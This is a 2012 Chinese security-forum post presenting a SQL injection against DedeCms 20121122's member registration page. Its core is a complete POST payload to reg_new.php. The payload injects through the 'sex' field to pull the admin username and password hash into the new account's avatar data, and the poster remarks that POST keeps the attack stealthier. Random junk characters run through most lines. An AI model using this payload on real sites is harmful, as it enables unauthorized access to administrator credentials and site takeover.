找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2094|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122
8 m5 A; n# l" s: h0 [7 p9 m4 I1 y' m7 C& W" G/ ^
需要magic_quotes_gpc=Off, s9 y! _! Z) |6 G1 w$ @6 b

7 V; M" J) T+ B" _: s应该是没有什么大危害的漏洞.0 P/ Q: p6 U, m( [0 `  k6 @' b' Z: q
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.7 `+ o! ]' l1 E) w

7 N- A; m5 W6 K; X是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
9 U8 b- J: x8 }/ ^! {3 M3 @POST提交以下数据,其实不用POST提交的,这样隐蔽点.
+ c8 L* c( v& z- h0 u5 ]! k8 m
- |. h8 E1 U* k. x) i1 i! vhttp:///de/member/reg_new.php
) A9 ^/ j$ a; I: ]" n7 |4 B+ F3 y- d- v! j
POST
$ w1 R) \( x, o) D9 Q  o4 }# p6 h- L/ J+ \
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=2 k8 b5 ?2 q* F

' X: ]' J  J9 R# @. ~  h成功注册后,头像处里面有好玩的信息.
6 m4 ]5 h" l0 D* \7 C: {+ f' q" y6 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表